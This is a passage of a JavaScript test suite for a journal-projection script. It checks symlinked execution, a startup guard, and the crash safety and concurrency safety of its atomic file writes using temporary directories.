  const realScripts = join(base, 'real-scripts');
  mkdirSync(realScripts);
  // project.mjs imports journal.mjs — the copy has to carry both.
  for (const name of ['project.mjs', 'journal.mjs', 'invisible.mjs']) {
    writeFileSync(join(realScripts, name), readFileSync(new URL(`../../scripts/${name}`, import.meta.url)));
  }
  const linked = join(base, 'linked-scripts');
  symlinkSync(realScripts, linked);

  const { d, file } = journal([ev()]);
  const r = spawnSync(process.execPath, [join(linked, 'project.mjs'), file, '--out-dir', d], {
    encoding: 'utf8',
  });
  assert.equal(r.status, 0, r.stderr);
  assert.match(r.stdout, /wrote /, 'the projector produced no output at all');
  assert.ok(existsSync(join(d, STATE_FILE)), `${STATE_FILE} was never written`);
  assert.ok(existsSync(join(d, PROGRESS_FILE)), `${PROGRESS_FILE} was never written`);
});

test('the self-run guard survives an argv[1] that cannot be canonicalized', () => {
  // project.mjs carries its OWN copy of the guard (deliberate: boot
  // boilerplate, not a domain rule), so it needs its own dead mutant.
  // Without the fallback, realpathSync throws out of module scope and every
  // importer of project.mjs dies at startup.
  const base = mkdtempSync(join(tmpdir(), 'tyran-argv-'));
  const harness = join(base, 'harness.mjs');
  writeFileSync(
    harness,
    "process.argv[1] = '/nonexistent-dir-" +
      "e2s6/entry.mjs';\n" +
      `await import(${JSON.stringify(SCRIPT)});\n` +
      "console.log('SURVIVED');\n",
  );
  const r = spawnSync(process.execPath, [harness], { encoding: 'utf8' });
  assert.equal(r.status, 0, r.stderr);
  assert.equal(r.stdout.trim(), 'SURVIVED');
});

// --- atomic writes -------------------------------------------------------

test('concurrent projections never leave a partial or temporary file', async () => {
  const out = dir();
  await Promise.all(
    Array.from({ length: 8 }, () =>
      new Promise((res, rej) => {
        const p = spawn(process.execPath, [SCRIPT, FIXTURE, '--out-dir', out]);
        let err = '';
        p.stderr.on('data', (c) => (err += c));
        p.on('close', (code) => (code === 0 ? res() : rej(new Error(`exit ${code}: ${err}`))));
      }),
    ),
  );
  assert.deepEqual(readdirSync(out).sort(), [PROGRESS_FILE, STATE_FILE].sort());
  for (const name of [STATE_FILE, PROGRESS_FILE]) {
    assert.deepEqual(readFileSync(join(out, name)), readFileSync(join(GOLDEN_DIR, name)));
  }
});

/**
 * Observing TEARING, not its absence. Two writers alternate two documents of
 * very different size on one path while this process reads in a loop: without
 * temp+rename the reader catches the file between truncate and refill. The
 * previous version of this test asserted "two files exist with the final
 * content", which a plain writeFileSync satisfies *better* (no temp file at
 * all) — it could not kill the mutant.
 */
test('atomic writes: a concurrent reader never observes a half-written document', async () => {
  const out = dir();
  const target = join(out, STATE_FILE);
  const big = GENERATED_HEAD + 'B'.repeat(2_000_000) + '\n';
  const small = GENERATED_HEAD + 'S'.repeat(64) + '\n';
  writeFileSync(target, small);

  const writer = (fill, len, iters) =>
    new Promise((res, rej) => {
      const code = `
        import { writeAtomic } from ${JSON.stringify(SCRIPT)};
        const body = process.env.HEAD + process.env.FILL.repeat(Number(process.env.LEN)) + '\\n';
        for (let i = 0; i < Number(process.env.ITERS); i++) writeAtomic(process.env.TARGET, body);
      `;
      const p = spawn(process.execPath, ['--input-type=module', '-e', code], {
        env: { ...process.env, TARGET: target, HEAD: GENERATED_HEAD, FILL: fill, LEN: String(len), ITERS: String(iters) },
      });
      let err = '';
      p.stderr.on('data', (c) => (err += c));
      p.on('close', (c) => (c === 0 ? res() : rej(new Error(`writer exit ${c}: ${err}`))));
    });

  let done = false;
  const writers = Promise.all([writer('B', 2_000_000, 25), writer('S', 64, 25)]).then(() => (done = true));

  let reads = 0;
  const torn = [];
  const seen = new Set();
  while (!done) {
    let raw;
    try {
      raw = readFileSync(target, 'utf8');
    } catch {
      continue; // ENOENT is impossible with rename, but never fail on the read itself
    }
    reads++;
    if (raw !== big && raw !== small) {
      torn.push(`len=${raw.length} head=${JSON.stringify(raw.slice(0, 20))} tail=${JSON.stringify(raw.slice(-3))}`);
    } else seen.add(raw.length);
    if (reads % 200 === 0) await new Promise((r) => setImmediate(r));
  }
  await writers;

  assert.ok(reads > 50, `reader did not observe the writers (only ${reads} reads)`);
  assert.deepEqual(torn.slice(0, 3), [], `torn reads: ${torn.length}/${reads}`);
  assert.equal(torn.length, 0);
  // vacuity guard: the reader must have seen the file actually change
  assert.equal(seen.size, 2, `reader only ever saw ${[...seen]} — it never raced a write`);
});

test('atomic writes: a failure hits the temp file, never the destination', (t) => {
  if (typeof process.getuid === 'function' && process.getuid() === 0) {
    t.skip('running as root: permissions are not enforced');
    return;
  }
  const out = dir();
  const target = join(out, STATE_FILE);
  writeFileSync(target, 'PREVIOUS PROJECTION\n');
  chmodSync(out, 0o500); // read + execute, no write
  let caught;
  try {
    writeAtomic(target, 'NEW CONTENT\n');
  } catch (err) {
    caught = err;
  } finally {
    chmodSync(out, 0o700);
  }
  assert.ok(caught, 'writeAtomic silently succeeded in a read-only directory');
  assert.equal(caught.code, 'EACCES');
  assert.match(caught.path ?? '', /\.tmp$/, `failure path was ${caught.path}, expected the temp file`);
  assert.equal(readFileSync(target, 'utf8'), 'PREVIOUS PROJECTION\n'); // untouched
  assert.deepEqual(readdirSync(out), [STATE_FILE]); // no temp left behind
});

test('writeAllAtomic: an unwritable directory fails before touching anything', (t) => {
  // NOTE: this does NOT prove staging-before-rename — the FIRST write already
  // fails here, so no rename happens in either the correct or the broken
  // implementation. The test below is the one that pins the ordering.
  if (typeof process.getuid === 'function' && process.getuid() === 0) {
    t.skip('running as root: permissions are not enforced');
    return;
  }
  const out = dir();
  writeFileSync(join(out, STATE_FILE), 'OLD STATE\n');
  writeFileSync(join(out, PROGRESS_FILE), 'OLD PROGRESS\n');
  chmodSync(out, 0o500);
  try {
    assert.throws(() =>
      writeAllAtomic([
        [join(out, STATE_FILE), 'NEW STATE\n'],
        [join(out, PROGRESS_FILE), 'NEW PROGRESS\n'],
      ]),
    );
  } finally {
    chmodSync(out, 0o700);
  }
  assert.equal(readFileSync(join(out, STATE_FILE), 'utf8'), 'OLD STATE\n');
  assert.equal(readFileSync(join(out, PROGRESS_FILE), 'utf8'), 'OLD PROGRESS\n');
  assert.deepEqual(readdirSync(out).sort(), [PROGRESS_FILE, STATE_FILE].sort());
});

test('writeAllAtomic stages EVERY file before renaming any of them', () => {
  // The first entry stages fine; the second cannot even be staged (its
  // directory does not exist). A rename-as-you-go implementation would have
  // already swapped STATE.md by then — this is what pins the ordering.
  const out = dir();
  writeFileSync(join(out, STATE_FILE), 'OLD STATE\n');
  assert.throws(() =>
    writeAllAtomic([
      [join(out, STATE_FILE), 'NEW STATE\n'],
      [join(out, 'no-such-dir', PROGRESS_FILE), 'NEW PROGRESS\n'],
    ]),
  );
  assert.equal(
    readFileSync(join(out, STATE_FILE), 'utf8'),
    'OLD STATE\n',
    'STATE.md was swapped before the whole set could be staged',
  );
  assert.deepEqual(readdirSync(out), [STATE_FILE], 'a temp file was left behind');
});

test('writeAllAtomic leaves no orphaned .tmp when a RENAME fails', () => {
  // Staging succeeds for both; the second rename then fails because the
  // destination path is a non-empty directory. The already-renamed first file
  // stays swapped (documented window) — but nothing may be left on disk.
  const out = dir();
  const blocked = join(out, PROGRESS_FILE);
  mkdirSync(blocked);
  writeFileSync(join(blocked, 'occupant'), 'x'); // rename onto it must fail
  writeFileSync(join(out, STATE_FILE), 'OLD STATE\n');

  assert.throws(() =>
    writeAllAtomic([
      [join(out, STATE_FILE), 'NEW STATE\n'],
      [blocked, 'NEW PROGRESS\n'],
    ]),
  );
  const leftovers = readdirSync(out).filter((f) => f.endsWith('.tmp'));
  assert.deepEqual(leftovers, [], `orphaned temp files: ${leftovers}`);
});
